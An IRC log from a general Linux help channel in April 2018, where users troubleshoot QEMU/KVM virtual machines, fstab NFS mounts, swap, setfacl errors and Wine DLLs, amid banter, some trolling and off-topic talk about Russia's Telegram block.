--- Log opened Thu Apr 19 00:00:14 2018 --- Day changed Thu Apr 19 2018 00:00 < snugger> So about to make the move to Fedora (More specifically Fedora 27 Cinnamon) 00:00 < wonderer> ok thx meyou_ 00:01 < kazdax> i am working on making a virtual machine using qemu 00:01 < kazdax> i setup the img file with qemu-img 00:01 < kazdax> then it says to type in qemu 00:01 < kazdax> but qhen i type qemu 00:01 < kazdax> it says command not found 00:01 < kazdax> $ qemu -hda debian.img -cdrom debian-testing-i386-businesscard.iso -boot d -m 256 00:01 < kazdax> do i need to install something else ? 00:02 < kazdax> i installed qemu 00:02 < Slimmy> How to filter a text file to only print its 2nd and 3rd character per line? its already sorted in lines 00:02 < wonderer> looks like that worked meyou_ 00:02 < wonderer> thx v.much :) 00:03 < kazdax> okay maybe qemu-x86_64 is the right one in this case 00:03 < kazdax> the debian docs arnt really current i think 00:03 < kazdax> right ? 00:05 < xamithan> No idea I use virt-manager for that unless I am scripting it 00:07 < kazdax> is there a graphical for QEMU? 00:08 < kazdax> aqemu 00:08 < kazdax> found it 00:08 < xamithan> You really want to be using qemu|kvm 00:08 < xamithan> It is much faster than plain qemu 00:08 < kazdax> i thought kvm was installed already 00:08 < kazdax> hold on let me check 00:09 < wonderer> how do i make an nfs permanent on my /etc/fstab tab? 00:10 < xamithan> The same way you mounted it just in a different syntax wonderer 00:10 < xamithan> server:/path/to/share /mount/location nfs options,here 0 0 00:11 < wonderer> i wasnt sure on the options 00:11 < wonderer> ty xamindar 00:11 < xamithan> You can use just "defaults" if it doesn't need a password or anything 00:12 < twainwek> god damn it guys no one answered slimmy and he left. lost another customer 00:13 < xamithan> Sorry I didn't know, that is more of a #bash question 00:25 < Frith> A while ago I was working on making a simple appliance for internal use, and I needed only one binary to run. I ended up just running it as the one thing from the init daemon, but I had hoped to find a "Write a system that only runs this"-type of program. Does that exist yet? 00:27 < Psi-Jack> xamithan: kvm is already merged back into we must. 00:27 < Psi-Jack> Qemu 00:28 < kazdax> is modprobe kvm command suppose to work 00:28 < kazdax> if its not working ion my system 00:28 < kazdax> what does that mean 00:29 < Psi-Jack> kazdax: you might prefer the more elegant qemu solution. Libvirtd, virt-manager, virt-viewer. 00:29 < kazdax> ahh 00:29 < kazdax> i think my virtualization is disabled in my bois 00:29 < kazdax> i need to look at that first 00:29 < Psi-Jack> kazdax: likely that kvm support is compiled in not as a kernel module 00:30 < kazdax> okay i am installing virt-manager 00:30 < kazdax> if that dosnt work ..ill check my bois to see if virtulization is disabled 00:31 < Psi-Jack> You need all three. 00:31 < kazdax> oh 00:31 < kazdax> i figured if i wanted to be an uber hacker..then learning the ins and out of my operating system 00:32 < kazdax> specially a linux would be a good way to go about it 00:32 < ayecee> gotta start somewhere, i guess 00:32 < kazdax> still stuck at runnign the qemu tho 00:32 < kazdax> yea 00:32 < kazdax> i thought programming was the start but system admin is a better more easier option imho 00:32 < ayecee> it's all a rich tapestry 00:32 < snugger> A systemd admin is like riding a bike 00:32 < snugger> system* 00:33 < snugger> But the bike is on fire 00:33 < xamithan> riding a bike? 00:33 < snugger> and the road is on fire 00:33 < snugger> and you're on fire 00:33 < snugger> and you're heading towards a dead end 00:33 < snugger> In hell 00:33 < xamithan> So you stop, drop, and roll. Climb on a new bike and take the shortcut to the left 00:34 < Frith> Oh, you sysadmins are all drama llamas. 00:34 < oerheks> uber hacker on a bike .. 00:35 < ayecee> i dunno, it's kinda fun. you get to decide the rules. 00:35 < ayecee> ideally 00:36 < ayecee> could get trapped in one of those positions where you have to keep up with the unreasonable demands of naive management. 00:36 < kazdax> horaay 00:36 < kazdax> virt-manager working 00:36 < kazdax> aqemu 00:36 < kazdax> not 00:40 < kazdax> this is cool 00:41 < kazdax> i learnt to mov a file from my falsh drive to my folder 00:41 < kazdax> learnt to create a vm 00:41 < kazdax> and got alot of links for studying .. okay i am going to go take some rest .. if i have any questions 00:41 < kazdax> i will sure to refer back here ..thanks alot 00:51 < Psilocyber> hey fam, this might be a silly question, but do the Ubuntu LTS versions use different drivers or should a LTS and "regular" release share the same drivers? 00:54 < Psilocyber> one of my devices states in the manual that you need to use LTS version of ubuntu, and im wondering why that is 00:54 < xamithan> It depends on the driver really 00:54 < koala_man> Psilocyber: does it say "any LTS version" or "14.04 LTS"? 00:54 < xamithan> You should always use the version for your specific release if available 00:55 < Frith> Psilocyber: Probably so that they aren't answering support questions about random versions. 00:55 < Psilocyber> xhci driver specifically 00:55 < Psilocyber> it lists kernel versions but then says LTS version only 00:55 < Psilocyber> range of kernel versions... 00:56 < koala_man> weird 00:56 < Psilocyber> this is the beast - https://www.startech.com/media/products/PEXUSB3S44V/PDFs/PEXUSB3S44V_Datasheet.pdf 00:57 < koala_man> does it mention Ubuntu at all? 00:58 < Psilocyber> Well, no, it says Linux 2.6.31 to 4.11.x 00:58 < Psilocyber> LTS versions only 00:59 < koala_man> surely that's Linux LTS and not related to Ubuntu 00:59 < kazdax> my virtual machine crashes in virt-managre 00:59 < kazdax> aftre a while 00:59 < kazdax> it runs smooth for a while but then crashes 00:59 < xamithan> Maybe they just mean an LTS kernel 00:59 < kazdax> its not paused or anything 00:59 < kazdax> its just stuck 00:59 < oerheks> xenial comes with 4.4, the oldest supported ubuntu 01:00 < xamithan> 14.04 is supported though?.. 01:00 < xamithan> Oh you mean the kernel 01:00 < Psilocyber> ok, my bad, I did not realize that was speaking of generic LTS kernel, I hear LTS and think ubuntu unfortunately 01:01 < oerheks> that -to 4.1 is so odd .. 01:02 < koala_man> typical CYA. that was the latest version when they released the product so it's the latest one they'll guarantee compatibility with 01:03 < Psilocyber> koala_man: yeah that makes sense 01:05 < koala_man> I imagine that any kernel after 2.6.31 is fine, and they just don't want to have to support a hundred different releases 01:06 < Psilocyber> the funny thing is, that it works for booting so BIOS obviously can work with it just doesnt work once the OS is loaded. 01:06 < snugger> Opinions: Do you think Wayland is stable enough to be shipped by default on all distros? 01:06 < Psi-Jack> snugger: Wayland itself might be, but drivers aren't for various vendors, software may not yet be designed for Wayland yet. So. No. 01:07 < snugger> Psi-Jack: My thoughts exactly 01:07 < oerheks> nvidia is making progress .. 01:07 < Psi-Jack> Fedora's using Wayland for the GDM login, but switches to Xorg upon login. You CAN try Gnome out fully in Wayland though, and see that it's just not quite ready for prime time entirely, yet. 01:07 < ntd> volta consumer hit the streets yet? 01:08 < Psi-Jack> Meanwhile, Russia is trying to block Telegram by blocking 16 million IPs. 01:08 < Sveta> good morning 01:08 < Psilocyber> we are shipping titan v systems here 01:08 < snugger> Whoa, a new version of Trisquel was released 01:08 < Psilocyber> researchers gobble them up 01:08 < snugger> that's huge news in my book 01:08 < Truxx> 16 million? How that many? 01:09 < snugger> https://trisquel.info/en/trisquel-80-lts-flidas 01:09 < Psi-Jack> Truxx: They blocked all IP blocks of Amazon & Google Cloud. heh 01:10 < ntd> amazon too? 01:10 < Psi-Jack> Yeah. heh 01:10 < Truxx> @Psi-Jack Oh, in that case there was much collateral damage - not only Telegram services I guess... 01:10 < Psi-Jack> Causing a huge uproar, and financial losses of even businesses in Russia due to such things. 01:10 < revel> Good old Roskomnadzor. 01:10 < ntd> last i heard, only goog. but that may have been goog no longer doing domain fronting 01:11 < Psi-Jack> ntd: Yeah. They're "unblocking" by individual basis... I facepalmed. 01:11 < Psilocyber> theres a good "in russia....." joke there somewhere 01:12 < Psi-Jack> It's just about time for them to disconnect from the internet and form their own rinternet. 01:12 < Psi-Jack> heh 01:12 < Frith> I would think it's mainly businesses in Russia that are impacted. 01:12 < ntd> do they block cludflare as well? 01:12 < Psi-Jack> ntd: That I don't know. 01:12 < Psi-Jack> Frith: And citizens. :) 01:12 < Psi-Jack> Heck, and foreigners visiting. 01:13 < Truxx> @Psi-Jack I almost said that businesses should not be affected as they could use VPNs, but then I realised VPNs are prohibited in Russia :/ 01:13 < Psi-Jack> Heh, exactly. 01:13 < Truxx> What a mess 01:13 < Psilocyber> VPN thing is fairly recent, i remember because PIA issued a notice 01:14 < Psilocyber> dont remember who said it, but someone said that if unscrupulous people are not using your communication system (terrorists/drug dealers/pedos) then it obviously isn't secure.... 01:14 < Frith> Psi-Jack: I didn't think you could order Vodka from Amazon, so I'm not sure how much impact there would really be. ;) 01:14 < Psi-Jack> Psilocyber: PIA? 01:14 < Psilocyber> sorry, private internet access 01:14 < Psi-Jack> Gotcha. 01:17 < Truxx> PIA is great, they saved Linux Journal if I remember correctly... They do many good things for the open source world... 01:17 < Psilocyber> they are also the only VPN provider to have their 'no logs' claim tested in court 01:18 * Psi-Jack shrugs. 01:18 < Psilocyber> FBI subpeonead their logs for some case and they said 'sorry, when we said no logs we meant it' 01:18 < Psi-Jack> I care nothing for 3rd-party "private internet" VPN providers. VPNs are for bridging two networks securely. 01:20 < Psilocyber> That is fair. 01:20 < Aph3x-WL> Psilocyber: for all we know that could have been staged to get people to use PIA ;) 01:20 < Truxx> @Psilocyber Good to read that about pia... some vpns betrayed customers before. I wonder: Is it a risk to install an old python tool that has not been updated for two years? 01:21 < Psilocyber> Aph3x-WL: im all for a good conspiracy, but that is a bit far for me even :P 01:21 < Truxx> At least cli-companion's last release was 2016 01:21 < Aph3x-WL> Psilocyber: it wouldn't be the first time in history that something like that has been done :P 01:22 < Psilocyber> yeah I'd say you are right about that 01:22 < toothe> Isn't there a command to log your terminal output? 01:23 < toothe> ie, what you type in and what you get back? 01:24 < ayecee> might be thinking of the script command, which records what you type but not what you get back 01:24 < oerheks> history | grep 01:24 < koala_man> 'script' does log responses 01:24 < ayecee> ah, i stand corrected 01:25 < Psi-Jack> Yeah, script does all that is displayed. :) 01:25 < ayecee> well then, i was accidentally right! 01:26 < Psi-Jack> hehe 01:26 < Truxx> Good to know about script... I only knew about that tool that records terminal sessions 01:28 < kazdax> how do i kill virt-manager ? 01:28 < ayecee> by surprise. it's watching you. 01:28 < xamithan> kill? 01:29 < kazdax> the process for it ...it seems to get my virtual machien stuck 01:29 < kazdax> i dont know if its kvm doing that or its virt-mananger 01:29 < kazdax> what ever the case it is ..my vm gets stuck 01:29 < kazdax> soi am trying to killt he process and spawn it back up again 01:29 < kazdax> and see if the problem persists or not 01:29 < xamithan> You could restart libvirtd 01:30 < xamithan> virt-manager is just a gui, even if you close it the VMs still run 01:30 < kazdax> libvirtd is the process name ? 01:30 < kazdax> the daemon thats running ? 01:31 < kazdax> should i not just killl kvm ..since thats the main process thats doing all the stuff 01:31 < toothe> yes, the script command! 01:32 < ayecee> \o/ 01:33 < kazdax> seems like i dont have libvirt 01:33 < stevendale> Hey kaza 01:33 < stevendale> kazdax 01:33 < ayecee> maybe you need the d 01:34 < kazdax> let me see if i can find a way to install it 01:34 < ayecee> uh. 01:35 < kazdax> ohh okay 01:35 < kazdax> i understand now 01:35 < ayecee> if it's not installed, then installing it and restarting it won't help. 01:35 < kazdax> libvirtd-daeomon ? 01:35 < xamithan> does it show up when you do systemctl status libvirtd ? 01:35 < kazdax> yes it does 01:36 < xamithan> Then just change status to restart 01:37 < kazdax> okay let me test if the restart helped fixed the problem 01:37 < redhatshekels> Do you guys think the yum package manager has a future? 01:37 < kazdax> i need to read up on this stuff 01:38 < xamithan> considering they already replaced it with dnf, no 01:38 < redhatshekels> yum isn't developed by dnf 01:38 < redhatshekels> It's its own project 01:38 < compdoc> Oracle Enterprise Linux 7.5 Debuts with Unbreakable Enterprise Kernel Release 4, based on RH 7.5 01:38 < xamithan> It is but it is a replacement, unless oracle or suse picks up yum it'll be gone 01:38 < Sveta> redhatshekels, yum is foss, i'm pretty sure there are or will be a few distributions that prefer it over dnf 01:39 < Emmanuel_Chanel> hi 01:40 < stevendale> o/ 01:40 < stevendale> Heya Emmanuel_Chanel 01:44 < kazdax> okay my virtual machine got stuck again 01:44 < kazdax> :( 01:44 < stevendale> o/ 01:44 < xamithan> how is it stuck 01:45 < stevendale> Okay AIDA64 Extreme says my Intel GM45 Graphics Processor Chipset is running at 533 MHz 01:45 < kazdax> its just stuck...the cursor isnt blinking anymore 01:45 < kazdax> its on in the GUI with terminal opened and the mouse dosnt move 01:45 < redhatshekels> Seems like Rust is more and more becoming a favorite for system programming in Linux. What are your thoughts on this? 01:46 < xamithan> Maybe you using a bad ISO or need some drivers 01:46 < xamithan> check the logs on it 01:47 < kazdax> maybe its a bad iso ..let me get the other one 01:47 < kazdax> check logs of virt-manager ? 01:48 < jml2> "the cursor isnt blinking anymore" tehehe 01:48 < jml2> :) 01:49 * jml2 chews on some more popcorn 01:50 < stevendale> o/ my Intel GPU is 10 years old o3o 01:52 < xamithan> No the logs inside the VM itself, although I guess you can't if it is frozen 01:54 < sirwilliam> Hilo all, does anyone know how to get in touch with someone from freenode? I was trying out IRC commands as I'm pretty new to it and I think it resulted in me getting banned. 01:54 < jml2> ^ :) 01:55 < sirwilliam> I usually hangout in ##chat, but now it takes me to arguments. 01:55 < jml2> LOL 01:55 < xamithan> Have you tried #freenode ? 01:55 < sirwilliam> LOL. 01:55 < jml2> hahaha sucker XD 01:55 < sirwilliam> No but good thanks, I'll jump over there. 01:55 < dell00> stevendale: o/ my AMD GPU is 12 years old o_o 01:56 < Sveta> sirwilliam: one good way is running '/stats p' several times a day until it starts listing someone's nick, then this nick may be queried with any questions 01:56 < stevendale> dell00 Intel GMA 4500MHD here, equivalent to an NVIDIA GeForce 9400M or AMD Radeon HD 3200 01:58 < Truxx> Something is missing on my xfce4 setup as firefox does not show a scrollbar (nor the "highlight" line on the menu after a right-click), but I have no clue which package that might be... maybe something with theme or gtk. 02:02 < stevendale> I wonder if my little Intel Core 2 Duo P8700 will run Linux well in VMWare Workstation 02:02 < dell00> stevendale: my AMD GPU is integrated into my Turion X2 CPU, so I don't even know what to call it. 02:03 < ozymandias> stevendale, its all down to the ram 02:03 < ozymandias> assuming you have enough for 2+ OSes you are fine 02:04 < jml2> i dont like people who advocate vmware over vbox. that's nasty. 02:04 < ozymandias> vbox works better for most OSS workloards 02:05 < ozymandias> than vmworkstation, at least 02:05 < xamithan> If your core 2 duo will even do vt-d 02:05 < ozymandias> if not, install vbox and use that 02:05 < ozymandias> it will run 32 bit just fine 02:06 < xamithan> by just fine you mean at anywhere from a 10-75% hit on performance 02:06 < ozymandias> not for 32 bit 02:06 < ozymandias> you only need vt-d for 64 bit virtualization 02:07 * stevendale running 32-bit OS 02:07 < jml2> I don't like people who use 32-bit 02:07 < ozymandias> for the guest? 02:07 < ozymandias> or the host 02:08 < ozymandias> it wont work as the host 02:08 < xamithan> Why not both 02:08 < ozymandias> too little ram 02:08 < ozymandias> i supose pae might work, but that will not be pretty 02:08 < stevendale> 4 GB DDR2 in Dual-Channel 02:08 < ozymandias> not enought ram 02:08 < jml2> pae if you have more than 4 gig. otherwise makes no difference 02:08 < afidegnum> i have been tasked to set up Linux System/Server Admin for students. what type of Linux Certification would you recommend? 02:09 < xamithan> afidegnum: What?.. 02:09 < ozymandias> none 02:09 < ozymandias> just teach them sysadmin 02:09 < jml2> afidegnum, you're supposed to be a teacher and you're asking for advice here on irc? LOL 02:09 * stevendale is on Windows XP, which is why he is using VMWare 02:09 < afidegnum> i mean the recomended Distro 02:10 < kazdax> hello 02:10 < kazdax> trying another ISO 02:10 < jml2> stevendale, I believe I could tell that. 02:10 < kazdax> see if this one works 02:10 < ozymandias> afidegnum, rhel 02:10 < stevendale> Heya kazdax 02:10 < xamithan> Whatever distro is best for whatever tasks you are doing 02:10 < helladen> Anyone manage to compile GitHub desktop client? 02:10 < kazdax> hey steve 02:10 < stevendale> What's up? 02:10 < kazdax> at my trusty friend xamithan 02:10 < ozymandias> if you are teachign it as a class, teach an enterprise os 02:10 < kazdax> if this dosnt work ..ill just install the OS 02:10 < stevendale> I used three times for a cloak in #freenode last night 02:10 < kazdax> nada much just trying to learn linux 02:10 < afidegnum> ozymandias: why rhel? 02:10 < kazdax> what about you steve 02:10 < jkemppainen> jml2: there's no need for that. a teacher who has the humility to ask questions when they don't know something isn't something to discourage or make fun of 02:10 < stevendale> Nobody got to me 02:10 < ozymandias> afidegnum, if you are teachign it as a class, teach an enterprise os 02:11 < stevendale> kazdax I'm recovering from choking yesterday 02:11 < kazdax> choking ? 02:11 < jml2> jkemppainen, and my guess is you are an expert just like the consensus. 02:11 < jml2> LOL 02:11 < ozymandias> rhel is much more widely used in professional environments 02:11 < ozymandias> so the skills are more directly applicable 02:12 < jml2> afidegnum, CentOS is a distro supported by Redhat, it is the closest thing to RH... if you want to save money. 02:12 < swift110> hey all 02:12 < jml2> ./closest thing to RHEL distro./ 02:12 < ozymandias> jml2, academic licenses are really cheap, but good point 02:12 < afidegnum> why RHEL, not Debian? 02:13 < ozymandias> afidegnum, teach them something employers use 02:13 < ozymandias> businesses want paid support 02:13 < jml2> debian is largely deployed out in the wild, but it doesn't carry the "enterprise" name.. RedHat is driving you with support and you said "certification". 02:13 < jml2> you want "Certification" with Debian? LOL 02:13 < jml2> good luck XD 02:13 < ozymandias> jml2, also many vendors wont touch debian 02:14 < kazdax> i just got the RHEL distro under the developer subscription 02:14 < kazdax> its free 02:14 < kazdax> what did i miss 02:14 < jml2> well its free for 30 days anyways... 02:14 < ozymandias> nada 02:14 < jml2> even without any developer subscription 02:14 < kazdax> so after 30 days ..reinstall i suppose ? 02:15 < applecrumble> Is there a way to change a file's endedness? 02:15 < harris> if i buy a 128 gb flash drive can I do all three of the following at once 1) have a usb installer of ubuntu 2) have a usb installer of windows 3) use it as a normal flashdrive 02:15 < applecrumble> Like from big-endian to little endian 02:15 < jml2> applecrumble, a file's "endianness" ? what kind of question is that? 02:15 < ozymandias> harris, yes 02:16 < jml2> applecrumble, at least spell what you think you're after correctly 02:16 < ozymandias> applecrumble, change the filesystem it is put on 02:16 < harris> ozymandias: i can do it all on 1 drive at the same time 02:16 < applecrumble> ozymandias: :^) thanks! 02:16 < ozymandias> harris, not concurrently, but yes -- you can format that drive that way 02:16 < ozymandias> obviously you cannot do all three at the same time at once 02:16 < ozymandias> but you can set it up to allow you to do any one of the three at a time 02:17 < harris> how would i do that? 02:17 < harris> 3 partitions? 02:17 < jml2> harris, nobody cares about windows installers. 02:17 < ozymandias> there are multiso tools out there 02:17 < xamithan> I use easy2boot for that, I'm sure you can do it manually if you want harris 02:17 < kazdax> i used a different ISO but still the same problem 02:17 < jml2> harris, installers are no more than a couple of gig. so 128gb is really a waste. 02:17 < ozymandias> slipstream them together 02:17 < jml2> harris, you can't spare 5 bucks for a 4 gig stick? 02:17 < kazdax> guess ill just try installing it on the system ..instead using live boot 02:18 < tyrese> hi 02:18 < kazdax> or do it on my windows system 02:18 < tyrese> is it possible to find all files created by a certain program? for instance, mspaint 02:18 < ozymandias> no 02:18 < jml2> tyrese, mspaint? wrong channel 02:18 < jml2> tyrese, #microsoft for mspaint young man 02:18 < jml2> LOL 02:18 < jml2> jkemppainen, you have something of an advice for mspaint too? 02:18 < ozymandias> you can find things owned by a user or group, or with a regex filename, though 02:19 < ozymandias> find . -iname \*jpg, for instance 02:19 < jkemppainen> jml2: huh? 02:19 < ozymandias> thats globbing, not regex, though 02:19 < jml2> jkemppainen, yah you, you joker 02:19 < tyrese> jml2: doesn't matter, it's still stored in the file 02:20 < jml2> tyrese, I introduce you to Azure Sphere OS, MS' latest and newest Linux distribution! 02:20 < ozymandias> tyrese, some apps and some formats will store that metadata, and you could therotically script it, but it would not be easy, and would take more details 02:20 < jml2> tyrese, https://www.zdnet.com/article/microsoft-introduces-azure-sphere-for-securing-iot-devices/ :)) 02:21 < ozymandias> are you literally looking for mspaint files? or images? 02:21 < harris> jml2: I want to get a dual usb c and usb 3.0 one... 02:22 < jml2> harris, iirc you're new, this is like week two you're into Linux. 02:22 < jml2> harris, just get those cheap Lexar Jump drives, they are widely compatible with a lot of motherboards 02:22 < harris> jml2: I have been using linux for about 7 years 02:23 < jml2> oh yeah, and you're talking about how the possibility of sharing a Windows installer... hmmphm 02:23 < jml2> shame! 02:23 < ozymandias> harris, gee thanks for making me feel old ;-) 02:23 < harris> ozymandias: any time 02:23 < harris> and jml2 i am taking some college classes that require word 02:23 < jml2> only noobs ask such questions... 02:24 < ozymandias> find a better college 02:24 < ozymandias> kik 02:24 < ozymandias> google docs should be sufficient 02:24 < dell00> Why should I use swap space even though I have 16 GB of RAM? 02:24 < ozymandias> dell00, for... swap 02:24 < dell00> But why? 02:24 < dell00> Is it necessary? 02:24 < ozymandias> so you can use more than 16gb of ram 02:24 < jml2> dell00, not really. 02:24 < jml2> dell00, ha! 02:25 < dell00> Ok. 02:25 < meyou^> if you use all your ram without swap oomkiller gone getcha 02:25 < jml2> I have 8gig ram, and I dont ever have a problem disabling swap 02:25 < prussian> so when your memory is exhasted you don't have situations where it's stalling while removing dentries and stuff 02:25 < meyou^> if you have swap it'll just swap to disk without slashing processed left and right 02:25 < dell00> I see.. 02:25 < bullgard4> [Debian unstable] Package: libss2 (Version 1.44.1-2): "command-line interface parsing library. It was originally inspired by the Multics SubSystem library." Do the letters "ss" in the name »libss2« stand for 'SubSystem'? 02:25 < dell00> Thanks. 02:25 < prussian> I'd just put 2GiB of swap for stale crap to go 02:25 < ozymandias> at the very least us 1gb of swap so you can detect memory issues 02:25 < jml2> meyou^, no crash if you open too much, it wont crash the system doofus. the app will fail to start 02:26 < meyou^> i didn't even use the word crash 02:26 < ozymandias> jml2, or craash if already running 02:26 < meyou^> wtf are you talking about 02:26 < ozymandias> or die if oomkiller gets it 02:26 < jml2> ozymandias, no doofus 02:26 < ozymandias> 'doofus'? 02:26 < meyou^> oh nvm i scrolled up you're just here to troll 02:26 < meyou^> carry on 02:27 < ozymandias> yup 02:27 < ozymandias> he has been trolling and giving bad advice for a while 02:27 < meyou^> nice hobby 02:27 < xamithan> I think his other name is danny_lee 02:27 < ozymandias> to each their own 02:27 < ozymandias> glad I have more in my life than that, personally 02:32 < jml2> meyou^, you must be another mspaint user 02:34 < jml2> bad advice? nah I quack at users who balk on windows things. 02:34 < tyrese> I found, searching by dimension was also a good idea 02:34 < stevendale> Windows isn't that bad 02:34 < jml2> and btw, which is true. MS did come out with a "Linux distribution" -> https://www.zdnet.com/article/microsoft-introduces-azure-sphere-for-securing-iot-devices 02:35 < tyrese> mspaint is actually great for quick diagrams 02:35 * stevendale uses illustrator & photoshop cs5 02:35 < ayecee> also for drawing in dicks on pictures of your boss 02:36 < robin> I keep getting an error when doing: DEBUG [8b4d004d] Command: /usr/bin/env setfacl -Rn -m u:www-data:rwX -m u::rwX /var/www/farmfes/releases 02:36 < tyrese> ok, it's a good free image editor 02:36 < robin> setfacl: Option -m: Invalid argument near character 3 02:37 < tyrese> gimp's ui makes drawing a circle a total nightmare 02:38 < jml2> tyrese, well there's also "tuxpaint" 02:38 < xamithan> What are you trying to do robin, that command looks all messed up 02:38 < jml2> tyrese, "Tux Paint is meant to be a simple drawing program for young children." 02:38 < jml2> tyrese, :) 02:39 < tyrese> no shame 02:39 < robin> xamithan: I'm trying to deploy with capistrano which a guy who left the company wrote and this was in there. 02:39 < ayecee> robin: what's the output of "id www-data" 02:39 < robin> ayecee: no such user 02:39 < ayecee> there's the problem 02:40 < robin> Ah, I see thanks! 02:40 < ayecee> :D 02:40 < robin> ;) 02:41 < ayecee> robin: fwiw, www-data started at the 3rd character in -m's arguments 02:41 < ayecee> hopefully a little less cryptic now 02:42 < robin> ayecee: nice, thanks again. 02:47 < swift110> sup ayecee 02:47 < ayecee> o/ 02:49 < joepublic> So, what happened to linuxcounter dot whatever? 02:50 < ayecee> cancer 02:50 < joepublic> of the project, or its maintainer? 02:50 < ayecee> idk just making things up 02:51 < joepublic> i'd say that's as good a guess an any so far 02:51 < ayecee> the older the project, the more reasonable that guess is 02:52 < joepublic> I see. 02:53 < stevendale> EasyPeasy? 02:54 < joepublic> yeah I had never heard of that one either. I doubt it lives up to the name, as well 02:54 < joepublic> their github page shows a little activity 8 months ago 02:55 < joepublic> "their" being linuxcounter's 02:55 < stevendale> EasyPeasy was made to be compatible with Eee PCs, mainly the 701/4G/4G Surf 02:55 < stevendale> Same as Android-x86's roots 02:56 < jml2> easypeasy is no longer maintained iirc like ages ago. 02:56 < stevendale> Yep 02:56 < ayecee> do they still make eee pcs? 02:56 < joepublic> I was looking for some numbers ala bsdstats -- and this looks like exactly that, except dead and rotting 02:56 < stevendale> Better off running Win XP anyway, or one of those shady "lite" versions of Windows 7 that runs in 1 or 2 GB HDD space 02:57 < stevendale> ayecee I don't think so, but plenty on eBay last I checked :) 02:57 < stevendale> I'm thinking about getting one myself to toss Win XP on 02:57 < ayecee> appropriate technology https://en.wikipedia.org/wiki/Appropriate_technology 02:57 * jml2 ignores stevendale "Windows XP" guy :) 02:58 < stevendale> Haha 02:58 < jml2> ozymandias, unless of course you want to help him chappy. 02:58 < joepublic> "Appropriate Technology" puts a whole new spin on "This is why we can't have nice things" ("We don't want them") 02:59 < stevendale> If I needed help with XP I'd ask in ##windows-legacy or ##dos 02:59 < ayecee> ("We're not there on the tech tree") 03:04 < dogbert2> 17:58:43 up 4 days, 3 min, 1 user, load average: 0.00, 0.00, 0.00 (lol) 03:05 < stevendale> OwO 03:05 * stevendale opens AIDA64 03:06 < stevendale> UpTime 7014 sec (0 days, 1 hours, 56 min, 54 sec) 03:06 < joepublic> I had an ARM board (a NanoPC T3) here I didn't mess with for over a year once; when I checked it, it had something like 400 days of uptime. 03:06 < jml2> dogbert2, beat ya 21:06:19 up 9 days, 21:03, 2 users, load average: 0.30, 0.12, 0.10 03:07 < well_laid_lawn> 11:08:32 up 41 days, 6:49, 1 user, load average: 0.01, 0.33, 0.55 03:09 < stevendale> Reboots are healthy for your computer 03:10 < joepublic> Nah, that's a myth 03:10 < xamithan> Only if you run windows 03:10 < dogbert2> what kind of linux box is yours, jml2 :) 03:10 < joepublic> if you run Windows, the reboots are healthy for your OS, sure, but for the computer? 03:12 < Voop> anyone know what do do about DLL missing errors in wine 03:12 < ozymandias> add them? 03:12 < joepublic> most solutions boil down to "provide the DLLs" 03:12 < jml2> dogbert2, just a debian workstation 03:13 < Voop> yeah but where do you get them. dll download sites are viruses 03:13 < ozymandias> a windows install 03:13 < ozymandias> at least if you want them legally 03:13 < ozymandias> that is why they are not part of wine 03:13 < joepublic> if the software runs in reactos or another windowslike OS such as windows, install it there and copy the DLLs over. 03:13 < Voop> i dont care about legally. but how am i supposed to install windows into wine 03:13 < ozymandias> you dont 03:13 < ozymandias> you copy the dlls from a windows install 03:13 < ayecee> we only do legal here, sorry 03:13 < joepublic> I assure no one cares how you do it if your goal is to "install windows into wine" 03:14 < jml2> joepublic, I'd tell them to go to #microsoft :) 03:14 < dogbert2> here is my system: http://98.160.179.12:8080/libre.html 03:14 < xamithan> More like head over to #winehq 03:14 < Voop> ok so just copy every DLL from a windows machine into the c drive of wine? 03:14 < jml2> ozymandias, you're a DLL idiot. 03:14 < Voop> sounds like a pain in the ass, but ok 03:14 < ozymandias> Voop, a sane person would just do the ones wine needs 03:14 < stevendale> Damn 03:15 < stevendale> I am turning off AutoPlay 03:15 < Voop> im going to go download a mass amount of illegal DLLs now 03:15 < Voop> see you guys later 03:15 < ozymandias> have fun 03:15 < stevendale> Have fun getting viruses 03:16 < Voop> please dont call the united nations on me for illegally obtaining the dlls 03:16 < ayecee> no promises 03:16 < ozymandias> no worries 03:16 < joepublic> There is an illegal DLL syndicate on every network junction these days 03:16 < ozymandias> joepublic, i saw two getting in a fight down the street last weekend 03:17 < ozymandias> took the national guard to get it under control 03:20 < oplevunus> After some uptime, my wan interface gets very slow, but after a ifdown and ifup, it gets back to normal speeds 03:20 < oplevunus> time to set up some hackish cron job 03:20 < joepublic> Someday I plan to write a series of articles called "Never Do This" about my hackish workarounds 03:21 < kazdax> so 03:21 < kazdax> i realised something important 03:22 < kazdax> i always thought i was a hacker because some kid called me a hacker 03:22 < kazdax> and then i looked it up online and i was like thats what i am 03:22 < joepublic> that cp and rsync don't copy all the files when you specify "*"? 03:22 < kazdax> then i realised after spending many many years trying to be a computer hacker in the sense of breaking security 03:22 < kazdax> that actually i just wanted the computer to do cool stuff 03:22 < kazdax> breaking stuff isnt bad in its off its self 03:23 < kazdax> but computers arnt just used for breaking code 03:23 < kazdax> there is so much you can do with em 03:23 < kazdax> i think ill focus on learning on how the operating system operates and what it can be used for ... 03:23 < joepublic> are you pasting from the novelization of the film "War Games", or is this just exposition? 03:24 < kazdax> sorry english isnt my first language 03:24 < kazdax> exposition meaning ? 03:24 < joepublic> your english is very good. exposition meaning "making it up as you go along" 03:24 < dogbert2> heh...man, Eddie Holman (Hey There Lonely Girl) <1970>...can really belt out da tunes 03:25 < kazdax> i mean people pigeon holed me into some place 03:25 < ayecee> kazdax: he's saying that what you're saying looks like a narrative and not conversation 03:25 < kazdax> sorry 03:25 < kazdax> if its a bad thing 03:25 < kazdax> i just thought i would share this 03:25 < joepublic> ayecee, not really, just that it could go either way and come context cues would help. 03:26 < ayecee> lies 03:26 < xamithan> What do people who use linux eat 03:26 < joepublic> kazdax, HeT, not a bad thing 03:26 < ayecee> doritos and mountain dew 03:26 < joepublic> that's true, doritos and mountain dew. 03:26 < kazdax> so i find new found ethuasim out of the dark 03:27 < joepublic> that's actually pretty awesome kazdax. 03:27 < kazdax> to do more than just wanting to prove myself to others that i can be a bad ass black hat hacker 03:27 < kazdax> yea 03:27 < kazdax> its a realisation in the night ..which is odd 03:27 < joepublic> I tend to worry more about others proving themselves to me, than me proving myself to others. 03:28 < ayecee> lies 03:28 < kazdax> the problem in my socity is that brahminsa re the ones that tell you what you should be 03:28 < kazdax> sorry maybe not the topic for this froom 03:28 < kazdax> i diggress 03:28 < ayecee> sure isn't 03:28 < kazdax> so what do you guys use linux for ? 03:29 < joepublic> well, many people here are interested in learning what their operating system can do. 03:29 < kazdax> being its an OS that can run on almost any hardware that runs a CPU 